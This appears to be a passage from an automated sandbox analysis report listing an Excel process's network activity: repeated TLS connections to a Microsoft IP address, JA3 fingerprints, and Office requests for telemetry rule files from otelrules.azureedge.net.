Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52509
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52516
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52516
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52510
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52510
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52510
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52510
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52517
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52517
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52513
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52513
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52513
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52513
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52518
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52518
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52512
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52512
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52512
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52512
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52511
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52511
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52511
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52511
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52519
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52520
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52520
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52519
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52516
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52516
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52516
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52518
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52518
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52518
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52519
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52519
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52519
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52517
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52517
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52517
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52520
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52520
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52520
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52516
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52516
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52516
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52516
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52521
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52521
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52518
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52518
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52518
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52518
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52522
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52522
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52519
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52519
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52519
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52519
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52517
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52517
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52523
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52517
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52517
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52523
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52524
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52524
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52520
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52520
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52520
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52520
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52525
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52525
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52521
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52521
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52521
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52523
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52523
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52523
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52525
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52525
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52525
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52522
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52522
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52522
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52524
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52524
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52524
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52521
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52521
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52521
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52521
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52527
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52527
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52523
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52523
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52523
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52528
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52528
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52525
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52525
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52525
Source: global trafficTCP traffic: 192.168.2.5:52529 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52529
Source: global trafficTCP traffic: 192.168.2.5:52529 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52529 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52529
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52522
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52522
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52522
Source: global trafficTCP traffic: 192.168.2.5:52530 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52530
Source: global trafficTCP traffic: 192.168.2.5:52530 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52530 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52530
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52524
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52524
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52524
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52524
Source: global trafficTCP traffic: 192.168.2.5:52531 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52531
Source: global trafficTCP traffic: 192.168.2.5:52531 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52531 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52531
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52528
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52528
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52528
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52527
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52527
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52527
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52529
Source: global trafficTCP traffic: 192.168.2.5:52529 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52529
Source: global trafficTCP traffic: 192.168.2.5:52529 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52529
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52530
Source: global trafficTCP traffic: 192.168.2.5:52530 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52530
Source: global trafficTCP traffic: 192.168.2.5:52530 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52530
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52531
Source: global trafficTCP traffic: 192.168.2.5:52531 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52531
Source: global trafficTCP traffic: 192.168.2.5:52531 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52531
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52528
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52528
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52528
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52528
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52527
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52527
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52532 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52532
Source: global trafficTCP traffic: 192.168.2.5:52532 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52527
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52527
Source: global trafficTCP traffic: 192.168.2.5:52532 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52532
Source: excel.exeMemory has grown: Private usage: 2MB later: 75MB
Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
